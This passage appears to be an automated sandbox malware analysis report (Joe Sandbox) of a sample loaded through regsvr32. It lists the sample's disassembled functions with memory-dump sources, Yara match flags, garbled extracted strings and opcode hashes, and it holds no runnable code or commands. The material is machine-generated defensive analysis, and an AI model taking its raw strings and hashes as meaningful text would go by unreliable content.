                                                                                                                                                                                                            • String ID: =$N@`Y$`Y
                                                                                                                                                                                                            • API String ID: 0-2183226064
                                                                                                                                                                                                            • Opcode ID: d2df9a4b86a3a0f31adfb1a7bc02e0a1df19d01470a0e79ca81506aab5c400ca
                                                                                                                                                                                                            • Instruction ID: 118fbb4a03473c283c91c54434b08502359be4c78a50d0e1e4bd26cbc1b12a00
                                                                                                                                                                                                            • Opcode Fuzzy Hash: d2df9a4b86a3a0f31adfb1a7bc02e0a1df19d01470a0e79ca81506aab5c400ca
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1A51D4B190074E8FDB44CF68C88A4DE7FB0FB68398F204619F856A6250D3B496A4CFD5
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 028FD5F0 Relevance: 3.8, Strings: 3, Instructions: 96COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382523652.00000000028E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028E1000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_28e1000_regsvr32.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: P$KGRa$wy
                                                                                                                                                                                                            • API String ID: 0-4077564265
                                                                                                                                                                                                            • Opcode ID: d053b19ec2bcb7975f54130f0bec91227afaf154fd553d0fa3630ba3df2317cc
                                                                                                                                                                                                            • Instruction ID: 963dfc3b4bb87d5f8b6a51ec62f3ff02245a92a57b66733140728a8dd8150d77
                                                                                                                                                                                                            • Opcode Fuzzy Hash: d053b19ec2bcb7975f54130f0bec91227afaf154fd553d0fa3630ba3df2317cc
                                                                                                                                                                                                            • Instruction Fuzzy Hash: D341C0B090074A8BDF48CF68C8865DE7FB0FB68348F51461DE84AA6290D37896A4CFC4
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 028FEAC0 Relevance: 3.8, Strings: 3, Instructions: 86COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382523652.00000000028E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028E1000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_28e1000_regsvr32.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: '0$~?$\
                                                                                                                                                                                                            • API String ID: 0-629757258
                                                                                                                                                                                                            • Opcode ID: 954a36b238481698c7266dd80e523f1c680ea4ba7fc80669a00137daf7e51e24
                                                                                                                                                                                                            • Instruction ID: f032863b75d8c4e767f0ca4b5a9a87e7616fec873dc53538261aea022ec48dc9
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 954a36b238481698c7266dd80e523f1c680ea4ba7fc80669a00137daf7e51e24
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5E41CEB0548B808BE718CF28C59A51ABBF1FBC5344F604A2DF6968A3A0D774D885CF42
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 028EDCB8 Relevance: 3.8, Strings: 3, Instructions: 80COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382523652.00000000028E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028E1000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_28e1000_regsvr32.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: A7$z$~*b
                                                                                                                                                                                                            • API String ID: 0-275545515
                                                                                                                                                                                                            • Opcode ID: b8479da6f0f4b7c6bcd662b5c54a20f953bf565876b4d716e1e2544701f062c2
                                                                                                                                                                                                            • Instruction ID: 38a8e013ee79580f35d507b3b9ec95434c28daff46213be5ae13470dc70623fc
                                                                                                                                                                                                            • Opcode Fuzzy Hash: b8479da6f0f4b7c6bcd662b5c54a20f953bf565876b4d716e1e2544701f062c2
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2641C3B180074E8FDB48CF64C48A5DE7FB0FB64398F204619E859A6250D3B896A9CFD5
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 028EA7F0 Relevance: 3.8, Strings: 3, Instructions: 72COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382523652.00000000028E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028E1000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_28e1000_regsvr32.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: H$rTk=${,%
                                                                                                                                                                                                            • API String ID: 0-3174111592
                                                                                                                                                                                                            • Opcode ID: cd8ee6c86ca05777d6c328effcc2208a9f98b66aff3d67038adbddc0681d1a7c
                                                                                                                                                                                                            • Instruction ID: 699ac74bf21723d0d0c3e35971aac89ae49bd6288fbe8cefee4eae68776bf546
                                                                                                                                                                                                            • Opcode Fuzzy Hash: cd8ee6c86ca05777d6c328effcc2208a9f98b66aff3d67038adbddc0681d1a7c
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 60312574528785ABD79CDF28C4C991EBBE1FBC5354F906A2CF882862A0C779C445CB03
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 000000018000B878 Relevance: 3.2, APIs: 2, Instructions: 227COMMONLIBRARYCODE
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382727206.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000003.00000002.382718711.0000000180000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.382760966.0000000180016000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.382805854.0000000180021000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.382817483.0000000180023000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: ExceptionRaise_clrfp
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 15204871-0
                                                                                                                                                                                                            • Opcode ID: 8a2068e512ce5aafa66155c105f3cea9dfcd9c81dc28570226bd282595299ab9
                                                                                                                                                                                                            • Instruction ID: df89035e7e7b250386178c13d978bdab97caeca02fa44d79d4a04f1db2bf885c
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8a2068e512ce5aafa66155c105f3cea9dfcd9c81dc28570226bd282595299ab9
                                                                                                                                                                                                            • Instruction Fuzzy Hash: BCB12C77610B888BEB56CF29C8463987BA0F348B88F15C915EB59877A8CF39C955CB01
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 0000000180010DB0 Relevance: 3.0, APIs: 2, Instructions: 20nativeCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382727206.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000003.00000002.382718711.0000000180000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.382760966.0000000180016000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.382805854.0000000180021000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000003.00000002.382817483.0000000180023000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: LinkObjectOpenSymbolic
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3706036087-0
                                                                                                                                                                                                            • Opcode ID: ba3160d82893de1fb7ee1bf22b66471d9f6f3cf414538ac49248103606f94efb
                                                                                                                                                                                                            • Instruction ID: f4502f775a5e45d64f420efd52fcf5a6929529857e1dcb94e78d5b08d8e8d060
                                                                                                                                                                                                            • Opcode Fuzzy Hash: ba3160d82893de1fb7ee1bf22b66471d9f6f3cf414538ac49248103606f94efb
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 23E0C230B1896842F7EA96BAAC017AB1051A34D7C0F70D429BA02C80C0DCA9C3894704
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 028F3FD0 Relevance: 2.9, Strings: 2, Instructions: 411COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382523652.00000000028E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028E1000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_28e1000_regsvr32.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: D?"$8zfK
                                                                                                                                                                                                            • API String ID: 0-617590365
                                                                                                                                                                                                            • Opcode ID: f58a98b4df58fdce72c0e7885dd3d804ba7ef7258294e614851e5dfa350b3c1c
                                                                                                                                                                                                            • Instruction ID: acb5ca5575d98274414566cb6b442076979d61e3550c83979998e575b20be018
                                                                                                                                                                                                            • Opcode Fuzzy Hash: f58a98b4df58fdce72c0e7885dd3d804ba7ef7258294e614851e5dfa350b3c1c
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 931212B550560DCBDB68DF38C48A49E3BE1FF58308F201129FD269B2A2D774D964CB85
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 028EC078 Relevance: 2.9, Strings: 2, Instructions: 384COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382523652.00000000028E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028E1000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_28e1000_regsvr32.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: #X$h}
                                                                                                                                                                                                            • API String ID: 0-3021649463
                                                                                                                                                                                                            • Opcode ID: b2db15c3223b800cd4780d66961112dd0400bb09218d3434ebea1e418095f42e
                                                                                                                                                                                                            • Instruction ID: 47972b662a3fb7844c8992c091332d7d10d1e2071468436691eb99854ce15f96
                                                                                                                                                                                                            • Opcode Fuzzy Hash: b2db15c3223b800cd4780d66961112dd0400bb09218d3434ebea1e418095f42e
                                                                                                                                                                                                            • Instruction Fuzzy Hash: D422A5749093888BEBF8DF24C889AD97BF1FF44704F90251ED84E9A690DB786645CF42
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 02909910 Relevance: 2.8, Strings: 2, Instructions: 322COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382523652.00000000028E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028E1000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_28e1000_regsvr32.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: #X$+ <
                                                                                                                                                                                                            • API String ID: 0-1007305072
                                                                                                                                                                                                            • Opcode ID: 3c586b07ab88afffe82ef26e7c4153d46f18f2014baa5345a66543dbad760a18
                                                                                                                                                                                                            • Instruction ID: 08603b052b1f0944c09598b2683d5e9218fab0a59ee25d3d3e6d923b39eac67d
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3c586b07ab88afffe82ef26e7c4153d46f18f2014baa5345a66543dbad760a18
                                                                                                                                                                                                            • Instruction Fuzzy Hash: B40278B5900709CFDB88CF68C58A5DD3BB9FB59308F404129FC1E9A2A0D3B4E919CB56
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 028FB460 Relevance: 2.8, Strings: 2, Instructions: 290COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382523652.00000000028E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028E1000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_28e1000_regsvr32.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: Hc$aYG
                                                                                                                                                                                                            • API String ID: 0-2147329803
                                                                                                                                                                                                            • Opcode ID: df90cc9616f2b9c1c24e5989ebcf8fe6102b1266bf85ba7b7bee55ae89225232
                                                                                                                                                                                                            • Instruction ID: f3ca26655e60bffcd6263cd645736acf3177f710e73ea10b330a03f141297ca1
                                                                                                                                                                                                            • Opcode Fuzzy Hash: df90cc9616f2b9c1c24e5989ebcf8fe6102b1266bf85ba7b7bee55ae89225232
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9CD1127960170DCBDB58CF28C58A59E3BE5FF58308F504129FD1E862A4D7B8E825CB46
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 028E33D4 Relevance: 2.8, Strings: 2, Instructions: 276COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382523652.00000000028E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028E1000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_28e1000_regsvr32.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: Ip$2/
                                                                                                                                                                                                            • API String ID: 0-2558650176
                                                                                                                                                                                                            • Opcode ID: e91aca82e16051f92f6dbdf3cee4f537082049766ade2dd9d76858b25ebc0c60
                                                                                                                                                                                                            • Instruction ID: d3295a3e9b9ad254c2e5e1b1cadbfc23509e4edbd1062822f89cf5f286c38111
                                                                                                                                                                                                            • Opcode Fuzzy Hash: e91aca82e16051f92f6dbdf3cee4f537082049766ade2dd9d76858b25ebc0c60
                                                                                                                                                                                                            • Instruction Fuzzy Hash: C9E1E274505B888FEBB8DF28CC89BEB7BA1FB4530AF10511AD84ADB290DB745685CF41
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 028E4214 Relevance: 2.8, Strings: 2, Instructions: 253COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382523652.00000000028E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028E1000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_28e1000_regsvr32.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CreateProcess
                                                                                                                                                                                                            • String ID: h$j-`
                                                                                                                                                                                                            • API String ID: 963392458-2572860821
                                                                                                                                                                                                            • Opcode ID: 7cf89bdd1f68ee687de5045feafb6fc4a467e2c1ecf066370c920de17f50795b
                                                                                                                                                                                                            • Instruction ID: 281ea9b6437226c54244aa70aabf66920654e47c86f41e36c6d87ac816573cad
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7cf89bdd1f68ee687de5045feafb6fc4a467e2c1ecf066370c920de17f50795b
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3FC1E371904788CFDB6CDFA8C88A59DBBB1FB58308F20421DE916AB661DBB49805CF41
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 028F6C70 Relevance: 2.7, Strings: 2, Instructions: 226COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382523652.00000000028E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028E1000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_28e1000_regsvr32.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: #z$UP
                                                                                                                                                                                                            • API String ID: 0-3609392360
                                                                                                                                                                                                            • Opcode ID: 550135c457ce9de0a38fa7ba25efe375c5c92efa4962973150589f83c0e84419
                                                                                                                                                                                                            • Instruction ID: 80e10d77324849879af34bb1856bbdc86d24f867993d091c9473062cfdebf26b
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 550135c457ce9de0a38fa7ba25efe375c5c92efa4962973150589f83c0e84419
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 66A16775904609CFDF58CFA8E4CA49EBBB0FB64348F204219E856E72A0D7749995CFC1
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 029094BC Relevance: 2.7, Strings: 2, Instructions: 194COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382523652.00000000028E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028E1000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_28e1000_regsvr32.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: )bkr$z~
                                                                                                                                                                                                            • API String ID: 0-4035444816
                                                                                                                                                                                                            • Opcode ID: 5b38f0d840313d9f3ca574d07702ced70b63c221434e660478dd8723dd507398
                                                                                                                                                                                                            • Instruction ID: 03e02d4d990f73ba6e14addd8337e2e3b845a0f636fb14874da1618e446260f5
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5b38f0d840313d9f3ca574d07702ced70b63c221434e660478dd8723dd507398
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 22815B7151478D8FEBB88F28CC867D937A0FB45714F508619DC8ECA292DF785A89CB42
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 028FEC30 Relevance: 2.7, Strings: 2, Instructions: 188COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382523652.00000000028E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028E1000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_28e1000_regsvr32.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: aK>$NM
                                                                                                                                                                                                            • API String ID: 0-1076587397
                                                                                                                                                                                                            • Opcode ID: c3bac648abfba249b47852098d41859ba07369c2655e972e771b32b502ff7dc2
                                                                                                                                                                                                            • Instruction ID: 6407150cb5a45277d81c5853a1fb675b1952f68fd9f1d816fba712e88e892e30
                                                                                                                                                                                                            • Opcode Fuzzy Hash: c3bac648abfba249b47852098d41859ba07369c2655e972e771b32b502ff7dc2
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 02B144B590030DCFDB98CF28C18A58D7BB8FB55348F505129FC1E9A2A0E3B5E614CB46
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 028F662C Relevance: 2.7, Strings: 2, Instructions: 179COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382523652.00000000028E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028E1000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_28e1000_regsvr32.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: GcX$cy5X
                                                                                                                                                                                                            • API String ID: 0-3427037236
                                                                                                                                                                                                            • Opcode ID: 31dac3876fb2c8203566e989269622a41f053c7142211a7d3c88141b18e189f4
                                                                                                                                                                                                            • Instruction ID: 2ba9ee99fd4b5da5ac6553b8f1cc96ff51b8c6a3465d131ef8d812a3e0888e56
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 31dac3876fb2c8203566e989269622a41f053c7142211a7d3c88141b18e189f4
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 26A1E7B4548388CBEBBEDF34C88A6D93BA9FB44B04F104619E91E8E290DF745785CB41
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 028EAC94 Relevance: 2.7, Strings: 2, Instructions: 169COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382523652.00000000028E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028E1000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_28e1000_regsvr32.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: &$U
                                                                                                                                                                                                            • API String ID: 0-326847644
                                                                                                                                                                                                            • Opcode ID: abfcacae90548ec85c0fd9e6913092660ec18354f469de3349c35ab14c6f872b
                                                                                                                                                                                                            • Instruction ID: 647b2a7918874becc343e193259ae33a65d4bc68d1eb112f8f432d4c895b2dd8
                                                                                                                                                                                                            • Opcode Fuzzy Hash: abfcacae90548ec85c0fd9e6913092660ec18354f469de3349c35ab14c6f872b
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7F9169B590038E8FDF48CF68D88A5DE7BB0FB14348F104A19F866AA250D7B4D665CB94
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 028F5A00 Relevance: 2.7, Strings: 2, Instructions: 168COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382523652.00000000028E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028E1000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_28e1000_regsvr32.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: k' {$z5
                                                                                                                                                                                                            • API String ID: 0-3484172565
                                                                                                                                                                                                            • Opcode ID: 0e04fcac124a95f8f36ba453d1c940f3a314ae21d4948ab7b59fa2d7b687fabd
                                                                                                                                                                                                            • Instruction ID: 542fa124b4bb04136e44572eb06287b591ba3b5c2461ad435d45db66150251b1
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0e04fcac124a95f8f36ba453d1c940f3a314ae21d4948ab7b59fa2d7b687fabd
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8E7117745007498FDB88DF28C88A5DE7BA1FB58348F514329ED8AAB260D378D994CFC5
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 028EAAB8 Relevance: 2.7, Strings: 2, Instructions: 152COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382523652.00000000028E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028E1000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_28e1000_regsvr32.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: 6$D
                                                                                                                                                                                                            • API String ID: 0-3309211938
                                                                                                                                                                                                            • Opcode ID: 28cfe374c9252ae38f661a0063e52509a8c1d1e6d70719d53b6096594a4bb1b4
                                                                                                                                                                                                            • Instruction ID: 819287cd4a5edb1a7b77b948c3064535628f5cce7a189ae0abab69c091223907
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 28cfe374c9252ae38f661a0063e52509a8c1d1e6d70719d53b6096594a4bb1b4
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 805158745247889BDB98CF28DC899993BE4FB45308F90622CFC8AC7292C774D886CB41
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 028F3B14 Relevance: 2.6, Strings: 2, Instructions: 118COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382523652.00000000028E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028E1000, based on PE: false
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_28e1000_regsvr32.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID: $$%9
                                                                                                                                                                                                            • API String ID: 0-3031553271
                                                                                                                                                                                                            • Opcode ID: a2fbf9250aa57a4feebe03f3fe744e7023f0b6fc9b26e85352855d54e5bc5225
                                                                                                                                                                                                            • Instruction ID: be6aec8a7c9fd7ecb119b8bf530324fddf1c24c7605078ecd4ba862a385955aa
                                                                                                                                                                                                            • Opcode Fuzzy Hash: a2fbf9250aa57a4feebe03f3fe744e7023f0b6fc9b26e85352855d54e5bc5225
                                                                                                                                                                                                            • Instruction Fuzzy Hash: F6413B7861C788ABD7D8DF19C0D562ABBE1FB88314F90596EF58AC7290C738C5448B42
                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                            Function 028E7530 Relevance: 2.6, Strings: 2, Instructions: 118COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000003.00000002.382523652.00000000028E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028E1000, based on PE: false
